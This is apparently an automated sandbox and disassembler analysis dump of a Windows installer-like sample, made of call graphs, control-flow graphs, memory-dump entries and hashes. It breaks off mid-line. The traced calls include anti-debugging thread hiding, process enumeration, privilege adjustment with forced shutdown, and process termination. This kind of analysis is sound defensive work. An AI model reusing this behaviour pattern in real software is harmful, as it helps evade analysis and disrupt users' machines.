66687 6c1749c9 66685->66687 66691 6c1749d5 SetLastError 66686->66691 66721 6c176b62 6 API calls std::_Lockit::_Lockit 66686->66721 66720 6c176b23 6 API calls std::_Lockit::_Lockit 66687->66720 66690 6c1749ed 66690->66691 66692 6c1749f1 66690->66692 66698 6c16ef64 66691->66698 66699 6c174a69 66691->66699 66722 6c1771e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66692->66722 66695 6c1749fd 66696 6c174a05 66695->66696 66697 6c174a1c 66695->66697 66723 6c176b62 6 API calls std::_Lockit::_Lockit 66696->66723 66725 6c176b62 6 API calls std::_Lockit::_Lockit 66697->66725 66713 6c179d66 66698->66713 66728 6c170ac9 37 API calls std::locale::_Setgloballocale 66699->66728 66704 6c174a28 66706 6c174a3d 66704->66706 66707 6c174a2c 66704->66707 66705 6c174a13 66724 6c1747bb HeapFree GetLastError _free 66705->66724 66727 6c1747bb HeapFree GetLastError _free 66706->66727 66726 6c176b62 6 API calls std::_Lockit::_Lockit 66707->66726 66710 6c174a19 66710->66691 66712 6c174a4f 66712->66691 66714 6c16ef6f 66713->66714 66715 6c179d78 GetPEB 66713->66715 66714->66681 66718 6c176d6f 5 API calls std::_Lockit::_Lockit 66714->66718 66715->66714 66716 6c179d8b 66715->66716 66729 6c176e18 5 API calls std::_Lockit::_Lockit 66716->66729 66718->66681 66719->66684 66720->66686 66721->66690 66722->66695 66723->66705 66724->66710 66725->66704 66726->66705 66727->66712 66729->66714 66730 6bfe3d62 66732 6bfe3bc0 66730->66732 66731 6bfe3e8a GetCurrentThread NtSetInformationThread 66733 6bfe3eea 66731->66733 66732->66731 66734 6bfff8a3 66735 6bfff887 66734->66735 66736 6c0002ac GetCurrentProcess TerminateProcess 66735->66736 66737 6c0002ca 66736->66737 66738 6bff3b72 66739 6c166a43 std::_Facet_Register 4 API calls 66738->66739 66747 6bff37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66739->66747 66740 6c15aec0 2 API calls 66740->66747 66741 6c00639e 66761 6c170130 18 API calls 2 library calls 66741->66761 66743 6c006ba0 104 API calls 66743->66747 66745 6c007090 77 API calls 66745->66747 66746 6c02e010 67 API calls 66746->66747 66747->66740 66747->66741 66747->66743 66747->66745 66747->66746 66751 6c006e60 66747->66751 66752 6c006e9f 66751->66752 66758 6c006eb3 66752->66758 66762 6c033560 32 API calls std::_Xinvalid_argument 66752->66762 66756 6c006f5b 66757 6c006f6e 66756->66757 66763 6c0337e0 32 API calls std::_Xinvalid_argument 66756->66763 66757->66747 66758->66756 66764 6c032250 30 API calls 66758->66764 66765 6c0326e0 24 API calls 4 library calls 66758->66765 66766 6c169379 RaiseException 66758->66766 66762->66758 66763->66757 66764->66758 66765->66758 66766->66758 66767 6bfe4b53 66768 6c166a43 std::_Facet_Register 4 API calls 66767->66768 66769 6bfe4b5c _Yarn 66768->66769 66770 6c15aec0 2 API calls 66769->66770 66775 6bfe4bae std::ios_base::_Ios_base_dtor 66770->66775 66771 6c00639e 66948 6c170130 18 API calls 2 library calls 66771->66948 66773 6bfe4cff 66774 6bfe5164 CreateFileA CloseHandle 66779 6bfe51ec 66774->66779 66775->66771 66775->66773 66775->66774 66776 6bff245a _Yarn _strlen 66775->66776 66776->66771 66778 6c15aec0 2 API calls 66776->66778 66794 6bff2a83 std::ios_base::_Ios_base_dtor 66778->66794 66925 6c165120 OpenSCManagerA 66779->66925 66781 6bfefc00 66941 6c165240 CreateToolhelp32Snapshot 66781->66941 66783 6c166a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66820 6bfe5478 std::ios_base::_Ios_base_dtor _Yarn _strlen 66783->66820 66786 6bff37d0 Sleep 66831 6bff37e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 66786->66831 66787 6c15aec0 2 API calls 66787->66820 66788 6c0063b2 66949 6bfe15e0 18 API calls std::ios_base::_Ios_base_dtor 66788->66949 66789 6c165240 4 API calls 66807 6bff053a 66789->66807 66790 6c165240 4 API calls 66812 6bff12e2 66790->66812 66792 6bfeffe3 66792->66789 66799 6bff0abc 66792->66799 66793 6c0064f8 66794->66771 66929 6c150390 66794->66929 66795 6c006ba0 104 API calls 66795->66820 66796 6c006e60 32 API calls 66796->66820 66798 6c165240 4 API calls 66798->66799 66799->66776 66799->66790 66800 6c007090 77 API calls 66800->66820 66801 6c165240 4 API calls 66821 6bff1dd9 66801->66821 66802 6bff211c 66802->66776 66803 6bff241a 66802->66803 66806 6c150390 11 API calls 66803->66806 66804 6c15aec0 2 API calls 66804->66831 66805 6c02e010 67 API calls 66805->66820 66809 6bff244d 66806->66809 66807->66798 66807->66799 66808 6bfe6722 66938 6c161880 25 API calls 4 library calls 66808->66938 66947 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66809->66947 66811 6bff2452 Sleep 66811->66776 66812->66801 66812->66802 66813 6bff16ac 66812->66813 66814 6bfe6162 66815 6bfe740b 66816 6c164ff0 4 API calls 66815->66816 66824 6bfe775a _strlen 66816->66824 66817 6c165240 4 API calls 66817->66802 66818 6c006ba0 104 API calls 66818->66831 66819 6c006e60 32 API calls 66819->66831 66820->66771 66820->66781 66820->66783 66820->66787 66820->66795 66820->66796 66820->66800 66820->66805 66820->66808 66820->66814 66821->66802 66821->66817 66822 6c007090 77 API calls 66822->66831 66823 6c02e010 67 API calls 66823->66831 66824->66771 66825 6bfe7ba9 66824->66825 66826 6bfe7b92 66824->66826 66829 6bfe7b43 _Yarn 66824->66829 66828 6c166a43 std::_Facet_Register 4 API calls 66825->66828 66827 6c166a43 std::_Facet_Register 4 API calls 66826->66827 66827->66829 66828->66829 66830 6c15aec0 2 API calls 66829->66830 66840 6bfe7be7 std::ios_base::_Ios_base_dtor 66830->66840 66831->66771 66831->66804 66831->66818 66831->66819 66831->66822 66831->66823 66832 6c164ff0 4 API calls 66843 6bfe8a07 66832->66843 66833 6bfe9d7f 66837 6c166a43 std::_Facet_Register 4 API calls 66833->66837 66834 6bfe9d68 66836 6c166a43 std::_Facet_Register 4 API calls 66834->66836 66835 6bfe962c _strlen 66835->66771 66835->66833 66835->66834 66838 6bfe9d18 _Yarn 66835->66838 66836->66838 66837->66838 66839 6c15aec0 2 API calls 66838->66839 66846 6bfe9dbd std::ios_base::_Ios_base_dtor 66839->66846 66840->66771 66840->66832 66840->66835 66841 6bfe8387 66840->66841 66842 6c164ff0 4 API calls 66851 6bfe9120 66842->66851 66843->66842 66844 6c164ff0 4 API calls 66861 6bfea215 _strlen 66844->66861 66845 6c164ff0 4 API calls 66847 6bfe9624 66845->66847 66846->66771 66846->66844 66852 6bfee8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66846->66852 66939 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66847->66939 66848 6c166a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66848->66852 66850 6c15aec0 2 API calls 66850->66852 66851->66845 66852->66771 66852->66848 66852->66850 66853 6bfeed02 Sleep 66852->66853 66854 6bfef7b1 66852->66854 66873 6bfee8c1 66853->66873 66940 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66854->66940 66856 6bfee8dd GetCurrentProcess TerminateProcess 66856->66852 66857 6bfea9bb 66860 6c166a43 std::_Facet_Register 4 API calls 66857->66860 66858 6bfea9a4 66859 6c166a43 std::_Facet_Register 4 API calls 66858->66859 66868 6bfea953 _Yarn _strlen 66859->66868 66860->66868 66861->66771 66861->66857 66861->66858 66861->66868 66862 6c164ff0 4 API calls 66862->66873 66863 6bfefbb8 66864 6bfefbe8 ExitWindowsEx Sleep 66863->66864 66864->66781 66865 6bfef7c0 66865->66863 66866 6bfeb009 66870 6c166a43 std::_Facet_Register 4 API calls 66866->66870 66867 6bfeaff0 66869 6c166a43 std::_Facet_Register 4 API calls 66867->66869 66868->66788 66868->66866 66868->66867 66871 6bfeafa0 _Yarn 66868->66871 66869->66871 66870->66871 66872 6c165960 104 API calls 66871->66872 66874 6bfeb059 std::ios_base::_Ios_base_dtor _strlen 66872->66874 66873->66852 66873->66856 66873->66862 66874->66771 66875 6bfeb42c 66874->66875 66876 6bfeb443 66874->66876 66879 6bfeb3da _Yarn _strlen 66874->66879 66877 6c166a43 std::_Facet_Register 4 API calls 66875->66877 66878 6c166a43 std::_Facet_Register 4 API calls 66876->66878 66877->66879 66878->66879 66879->66788 66880 6bfeb79e 66879->66880 66881 6bfeb7b7 66879->66881 66884 6bfeb751 _Yarn 66879->66884 66882 6c166a43 std::_Facet_Register 4 API calls 66880->66882 66883 6c166a43 std::_Facet_Register 4 API calls 66881->66883 66882->66884 66883->66884 66885 6c165960 104 API calls 66884->66885 66886 6bfeb804 std::ios_base::_Ios_base_dtor _strlen 66885->66886 66886->66771 66887 6bfebc0f 66886->66887 66888 6bfebc26 66886->66888 66891 6bfebbbd _Yarn _strlen 66886->66891 66889 6c166a43 std::_Facet_Register 4 API calls 66887->66889 66890 6c166a43 std::_Facet_Register 4 API calls 66888->66890 66889->66891 66890->66891 66891->66788 66892 6bfec08e 66891->66892 66893 6bfec075 66891->66893 66896 6bfec028 _Yarn 66891->66896 66895 6c166a43 std::_Facet_Register 4 API calls 66892->66895 66894 6c166a43 std::_Facet_Register 4 API calls 66893->66894 66894->66896 66895->66896 66897 6c165960 104 API calls 66896->66897 66902 6bfec0db std::ios_base::_Ios_base_dtor _strlen 66897->66902 66898 6bfec7bc 66901 6c166a43 std::_Facet_Register 4 API calls 66898->66901 66899 6bfec7a5 66900 6c166a43 std::_Facet_Register 4 API calls 66899->66900 66909 6bfec753 _Yarn _strlen 66900->66909 66901->66909 66902->66771 66902->66898 66902->66899 66902->66909 66903 6bfed3ed 66905 6c166a43 std::_Facet_Register 4 API calls 66903->66905 66904 6bfed406 66906 6c166a43 std::_Facet_Register 4 API calls 66904->66906 66907 6bfed39a _Yarn 66905->66907 66906->66907 66908 6c165960 104 API calls 66907->66908 66910 6bfed458 std::ios_base::_Ios_base_dtor _strlen 66908->66910 66909->66788 66909->66903 66909->66904 66909->66907 66915 6bfecb2f 66909->66915 66910->66771 66911 6bfed8bb 66910->66911 66912 6bfed8a4 66910->66912 66916 6bfed852 _Yarn _strlen 66910->66916 66913 6c166a43 std::_Facet_Register 4 API calls 66911->66913 66914 6c166a43 std::_Facet_Register 4 API calls 66912->66914 66913->66916 66914->66916 66916->66788 66917 6bfedccf 66916->66917 66918 6bfedcb6 66916->66918 66921 6bfedc69 _Yarn 66916->66921 66920 6c166a43 std::_Facet_Register 4 API calls 66917->66920 66919 6c166a43 std::_Facet_Register 4 API calls 66918->66919 66919->66921 66920->66921 66922 6c165960 104 API calls 66921->66922 66924 6bfedd1c std::ios_base::_Ios_base_dtor 66922->66924 66923 6c164ff0 4 API calls 66923->66852 66924->66771 66924->66923 66926 6c165156 66925->66926 66927 6c1651e8 OpenServiceA 66926->66927 66928 6c16522f 66926->66928 66927->66926 66928->66820 66935 6c1503a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 66929->66935 66930 6c15310e CloseHandle 66930->66935 66931 6c153f5f CloseHandle 66931->66935 66932 6c15251b CloseHandle 66932->66935 66933 6bff37cb 66937 6c165d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66933->66937 66934 6c13c1e0 WriteFile WriteFile WriteFile ReadFile 66934->66935 66935->66930 66935->66931 66935->66932 66935->66933 66935->66934 66950 6c13b730 66935->66950 66937->66786 66938->66815 66939->66835 66940->66865 66942 6c1652a0 std::locale::_Setgloballocale 66941->66942 66943 6c165277 CloseHandle 66942->66943 66944 6c165320 Process32NextW 66942->66944 66945 6c1653b1 66942->66945 66946 6c165345 Process32FirstW 66942->66946 66943->66942 66944->66942 66945->66792 66946->66942 66947->66811 66949->66793 66952 6c13b743 _Yarn __wsopen_s std::locale::_Setgloballocale 66950->66952 66951 6c13c180 66951->66935 66952->66951 66953 6c13bced CreateFileA 66952->66953 66955 6c13aa30 66952->66955 66953->66952 66956 6c13aa43 __wsopen_s std::locale::_Setgloballocale 66955->66956 66957 6c13b3e9 WriteFile 66956->66957 66958 6c13b43d WriteFile 66956->66958 66959 6c13b718 66956->66959 66960 6c13ab95 ReadFile 66956->66960 66957->66956 66958->66956 66959->66952 66960->66956
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: HR^
                                    • API String ID: 4218353326-1341859651
                                    • Opcode ID: 5123df0cc83ce9fc2861a971cd65eac5ecfecf5cd6d2117c57abe9f8bc05991e
                                    • Instruction ID: 13ba9b51f5f0e33ac78a963e5fa2b438f96b56c4b6afab19da896af0a33b7d54
                                    • Opcode Fuzzy Hash: 5123df0cc83ce9fc2861a971cd65eac5ecfecf5cd6d2117c57abe9f8bc05991e
                                    • Instruction Fuzzy Hash: E674F772644B028FC728CF28C8D06A5B7F3EF95314B198A6DC0968B765E778B54BCB50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: }jk$;T55$L@^
                                    • API String ID: 0-4218709813
                                    • Opcode ID: 278475e1851fcffacc4d836e03b9db5b0088ecb9f45fa6914fa95b50e9ad29c3
                                    • Instruction ID: 9c506f6e421e043f6946edb48ca653716478f0718fc499d42488f5e32d02114e
                                    • Opcode Fuzzy Hash: 278475e1851fcffacc4d836e03b9db5b0088ecb9f45fa6914fa95b50e9ad29c3
                                    • Instruction Fuzzy Hash: 533407726447018FC728CF28C8D0A95B7E7EF85314B198A6DC0AA4B775EB78B54BCB50

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7677 6c165240-6c165275 CreateToolhelp32Snapshot 7678 6c1652a0-6c1652a9 7677->7678 7679 6c1652e0-6c1652e5 7678->7679 7680 6c1652ab-6c1652b0 7678->7680 7683 6c165377-6c1653a1 call 6c172c05 7679->7683 7684 6c1652eb-6c1652f0 7679->7684 7681 6c165315-6c16531a 7680->7681 7682 6c1652b2-6c1652b7 7680->7682 7689 6c1653a6-6c1653ab 7681->7689 7690 6c165320-6c165332 Process32NextW 7681->7690 7685 6c165334-6c16535d call 6c16b920 Process32FirstW 7682->7685 7686 6c1652b9-6c1652be 7682->7686 7683->7678 7687 6c165277-6c165292 CloseHandle 7684->7687 7688 6c1652f2-6c1652f7 7684->7688 7696 6c165362-6c165372 7685->7696 7686->7678 7694 6c1652c0-6c1652d1 7686->7694 7687->7678 7688->7678 7695 6c1652f9-6c165313 7688->7695 7689->7678 7693 6c1653b1-6c1653bf 7689->7693 7690->7696 7694->7678 7695->7678 7696->7678
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C16524E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: CreateSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 3332741929-0
                                    • Opcode ID: ffa38a5fd806f82b09f5feddd28497b9f5eb8d1b4194c5ec2f7e957e34d985dd
                                    • Instruction ID: 88186afa72a6287c055da25d7454a4bf22f2f197732e04ff17b524da92669582
                                    • Opcode Fuzzy Hash: ffa38a5fd806f82b09f5feddd28497b9f5eb8d1b4194c5ec2f7e957e34d985dd
                                    • Instruction Fuzzy Hash: 1A315C74608340DFD7109F2AC888B1ABBF4AF96744F51492EF898C7BA1D371D8588B52

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7821 6bfe3886-6bfe388e 7822 6bfe3894-6bfe3896 7821->7822 7823 6bfe3970-6bfe397d 7821->7823 7822->7823 7824 6bfe389c-6bfe38b9 7822->7824 7825 6bfe397f-6bfe3989 7823->7825 7826 6bfe39f1-6bfe39f8 7823->7826 7827 6bfe38c0-6bfe38c1 7824->7827 7825->7824 7828 6bfe398f-6bfe3994 7825->7828 7829 6bfe39fe-6bfe3a03 7826->7829 7830 6bfe3ab5-6bfe3aba 7826->7830 7831 6bfe395e 7827->7831 7833 6bfe399a-6bfe399f 7828->7833 7834 6bfe3b16-6bfe3b18 7828->7834 7835 6bfe3a09-6bfe3a2f 7829->7835 7836 6bfe38d2-6bfe38d4 7829->7836 7830->7824 7832 6bfe3ac0-6bfe3ac7 7830->7832 7841 6bfe3960-6bfe3964 7831->7841 7832->7827 7840 6bfe3acd-6bfe3ad6 7832->7840 7842 6bfe383b-6bfe3855 call 6c131470 call 6c131480 7833->7842 7843 6bfe39a5-6bfe39bf 7833->7843 7834->7827 7837 6bfe38f8-6bfe3955 7835->7837 7838 6bfe3a35-6bfe3a3a 7835->7838 7839 6bfe3957-6bfe395c 7836->7839 7837->7839 7844 6bfe3b1d-6bfe3b22 7838->7844 7845 6bfe3a40-6bfe3a57 7838->7845 7839->7831 7840->7834 7846 6bfe3ad8-6bfe3aeb 7840->7846 7848 6bfe396a 7841->7848 7849 6bfe3860-6bfe3885 7841->7849 7842->7849 7850 6bfe3a5a-6bfe3a5d 7843->7850 7856 6bfe3b49-6bfe3b50 7844->7856 7857 6bfe3b24-6bfe3b44 7844->7857 7845->7850 7846->7837 7853 6bfe3af1-6bfe3af8 7846->7853 7855 6bfe3ba1-6bfe3bb6 7848->7855 7849->7821 7851 6bfe3aa9-6bfe3ab0 7850->7851 7852 6bfe3a87-6bfe3aa7 7850->7852 7851->7841 7852->7851 7859 6bfe3afa-6bfe3aff 7853->7859 7860 6bfe3b62-6bfe3b85 7853->7860 7864 6bfe3bc0-6bfe3bda call 6c131470 call 6c131480 7855->7864 7856->7827 7862 6bfe3b56-6bfe3b5d 7856->7862 7857->7852 7859->7839 7860->7837 7865 6bfe3b8b 7860->7865 7862->7841 7872 6bfe3be0-6bfe3bfe 7864->7872 7865->7855 7875 6bfe3e7b 7872->7875 7876 6bfe3c04-6bfe3c11 7872->7876 7879 6bfe3e81-6bfe3ee0 call 6bfe3750 GetCurrentThread NtSetInformationThread 7875->7879 7877 6bfe3c17-6bfe3c20 7876->7877 7878 6bfe3ce0-6bfe3cea 7876->7878 7883 6bfe3c26-6bfe3c2d 7877->7883 7884 6bfe3dc5 7877->7884 7881 6bfe3cec-6bfe3d0c 7878->7881 7882 6bfe3d3a-6bfe3d3c 7878->7882 7892 6bfe3eea-6bfe3f04 call 6c131470 call 6c131480 7879->7892 7886 6bfe3d90-6bfe3d95 7881->7886 7887 6bfe3d3e-6bfe3d45 7882->7887 7888 6bfe3d70-6bfe3d8d 7882->7888 7889 6bfe3dc3 7883->7889 7890 6bfe3c33-6bfe3c3a 7883->7890 7891 6bfe3dc6 7884->7891 7894 6bfe3dba-6bfe3dc1 7886->7894 7895 6bfe3d97-6bfe3db8 7886->7895 7893 6bfe3d50-6bfe3d57 7887->7893 7888->7886 7889->7884 7896 6bfe3e26-6bfe3e2b 7890->7896 7897 6bfe3c40-6bfe3c5b 7890->7897 7898 6bfe3dc8-6bfe3dcc 7891->7898 7915 6bfe3f75-6bfe3fa1 7892->7915 7893->7891 7894->7889 7902 6bfe3dd7-6bfe3ddc 7894->7902 7895->7884 7899 6bfe3c7b-6bfe3cd0 7896->7899 7900 6bfe3e31 7896->7900 7903 6bfe3e1b-6bfe3e24 7897->7903 7898->7872 7904 6bfe3dd2 7898->7904 7899->7893 7900->7864 7905 6bfe3dde-6bfe3e17 7902->7905 7906 6bfe3e36-6bfe3e3d 7902->7906 7903->7898 7908 6bfe3e76-6bfe3e79 7904->7908 7905->7903 7910 6bfe3e3f-6bfe3e5a 7906->7910 7911 6bfe3e5c-6bfe3e5f 7906->7911 7908->7879 7910->7903 7911->7899 7913 6bfe3e65-6bfe3e69 7911->7913 7913->7898 7913->7908 7919 6bfe3fa3-6bfe3fa8 7915->7919 7920 6bfe4020-6bfe4026 7915->7920 7923 6bfe3fae-6bfe3fcf 7919->7923 7924 6bfe407c-6bfe4081 7919->7924 7921 6bfe402c-6bfe403c 7920->7921 7922 6bfe3f06-6bfe3f35 7920->7922 7925 6bfe403e-6bfe4058 7921->7925 7926 6bfe40b3-6bfe40b8 7921->7926 7929 6bfe3f38-6bfe3f61 7922->7929 7927 6bfe40aa-6bfe40ae 7923->7927 7924->7927 7928 6bfe4083-6bfe408a 7924->7928 7931 6bfe405a-6bfe4063 7925->7931 7926->7923 7933 6bfe40be-6bfe40c9 7926->7933 7930 6bfe3f6b-6bfe3f6f 7927->7930 7928->7929 7932 6bfe4090 7928->7932 7934 6bfe3f64-6bfe3f67 7929->7934 7930->7915 7935 6bfe4069-6bfe406c 7931->7935 7936 6bfe40f5-6bfe413f 7931->7936 7932->7892 7933->7927 7937 6bfe40cb-6bfe40d4 7933->7937 7938 6bfe3f69 7934->7938 7939 6bfe4144-6bfe414b 7935->7939 7940 6bfe4072-6bfe4077 7935->7940 7936->7938 7941 6bfe40d6-6bfe40f0 7937->7941 7942 6bfe40a7 7937->7942 7938->7930 7939->7930 7940->7934 7941->7931 7942->7927
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                    • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b2ea2ffce325a03b2514a4ba0d0661d38603b33fb6a53e6e965e9b75c9aa92f4
                                    • Instruction ID: 722602452fd45cfdf2fbfd1f8eec956efe86996cabe01ac98ccabc47c99e5af2
                                    • Opcode Fuzzy Hash: b2ea2ffce325a03b2514a4ba0d0661d38603b33fb6a53e6e965e9b75c9aa92f4
                                    • Instruction Fuzzy Hash: 9A32C233244B018FC335CF28C8946A5B7E3EF913147698AADC0EA5B665D779B44BCB60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 7969 6bfe3a6a-6bfe3a85 7970 6bfe3a87-6bfe3aa7 7969->7970 7971 6bfe3aa9-6bfe3ab0 7970->7971 7972 6bfe3960-6bfe3964 7971->7972 7973 6bfe396a 7972->7973 7974 6bfe3860-6bfe388e 7972->7974 7975 6bfe3ba1-6bfe3bb6 7973->7975 7983 6bfe3894-6bfe3896 7974->7983 7984 6bfe3970-6bfe397d 7974->7984 7978 6bfe3bc0-6bfe3bda call 6c131470 call 6c131480 7975->7978 7991 6bfe3be0-6bfe3bfe 7978->7991 7983->7984 7986 6bfe389c-6bfe38b9 7983->7986 7988 6bfe397f-6bfe3989 7984->7988 7989 6bfe39f1-6bfe39f8 7984->7989 7990 6bfe38c0-6bfe38c1 7986->7990 7988->7986 7992 6bfe398f-6bfe3994 7988->7992 7993 6bfe39fe-6bfe3a03 7989->7993 7994 6bfe3ab5-6bfe3aba 7989->7994 7995 6bfe395e 7990->7995 8011 6bfe3e7b 7991->8011 8012 6bfe3c04-6bfe3c11 7991->8012 7998 6bfe399a-6bfe399f 7992->7998 7999 6bfe3b16-6bfe3b18 7992->7999 8000 6bfe3a09-6bfe3a2f 7993->8000 8001 6bfe38d2-6bfe38d4 7993->8001 7994->7986 7997 6bfe3ac0-6bfe3ac7 7994->7997 7995->7972 7997->7990 8006 6bfe3acd-6bfe3ad6 7997->8006 8007 6bfe383b-6bfe3855 call 6c131470 call 6c131480 7998->8007 8008 6bfe39a5-6bfe39bf 7998->8008 7999->7990 8002 6bfe38f8-6bfe3955 8000->8002 8003 6bfe3a35-6bfe3a3a 8000->8003 8004 6bfe3957-6bfe395c 8001->8004 8002->8004 8009 6bfe3b1d-6bfe3b22 8003->8009 8010 6bfe3a40-6bfe3a57 8003->8010 8004->7995 8006->7999 8013 6bfe3ad8-6bfe3aeb 8006->8013 8007->7974 8015 6bfe3a5a-6bfe3a5d 8008->8015 8021 6bfe3b49-6bfe3b50 8009->8021 8022 6bfe3b24-6bfe3b44 8009->8022 8010->8015 8019 6bfe3e81-6bfe3ee0 call 6bfe3750 GetCurrentThread NtSetInformationThread 8011->8019 8016 6bfe3c17-6bfe3c20 8012->8016 8017 6bfe3ce0-6bfe3cea 8012->8017 8013->8002 8018 6bfe3af1-6bfe3af8 8013->8018 8015->7970 8015->7971 8026 6bfe3c26-6bfe3c2d 8016->8026 8027 6bfe3dc5 8016->8027 8024 6bfe3cec-6bfe3d0c 8017->8024 8025 6bfe3d3a-6bfe3d3c 8017->8025 8028 6bfe3afa-6bfe3aff 8018->8028 8029 6bfe3b62-6bfe3b85 8018->8029 8041 6bfe3eea-6bfe3f04 call 6c131470 call 6c131480 8019->8041 8021->7990 8031 6bfe3b56-6bfe3b5d 8021->8031 8022->7970 8034 6bfe3d90-6bfe3d95 8024->8034 8035 6bfe3d3e-6bfe3d45 8025->8035 8036 6bfe3d70-6bfe3d8d 8025->8036 8037 6bfe3dc3 8026->8037 8038 6bfe3c33-6bfe3c3a 8026->8038 8040 6bfe3dc6 8027->8040 8028->8004 8029->8002 8032 6bfe3b8b 8029->8032 8031->7972 8032->7975 8043 6bfe3dba-6bfe3dc1 8034->8043 8044 6bfe3d97-6bfe3db8 8034->8044 8042 6bfe3d50-6bfe3d57 8035->8042 8036->8034 8037->8027 8045 6bfe3e26-6bfe3e2b 8038->8045 8046 6bfe3c40-6bfe3c5b 8038->8046 8047 6bfe3dc8-6bfe3dcc 8040->8047 8064 6bfe3f75-6bfe3fa1 8041->8064 8042->8040 8043->8037 8051 6bfe3dd7-6bfe3ddc 8043->8051 8044->8027 8048 6bfe3c7b-6bfe3cd0 8045->8048 8049 6bfe3e31 8045->8049 8052 6bfe3e1b-6bfe3e24 8046->8052 8047->7991 8053 6bfe3dd2 8047->8053 8048->8042 8049->7978 8054 6bfe3dde-6bfe3e17 8051->8054 8055 6bfe3e36-6bfe3e3d 8051->8055 8052->8047 8057 6bfe3e76-6bfe3e79 8053->8057 8054->8052 8059 6bfe3e3f-6bfe3e5a 8055->8059 8060 6bfe3e5c-6bfe3e5f 8055->8060 8057->8019 8059->8052 8060->8048 8062 6bfe3e65-6bfe3e69 8060->8062 8062->8047 8062->8057 8068 6bfe3fa3-6bfe3fa8 8064->8068 8069 6bfe4020-6bfe4026 8064->8069 8072 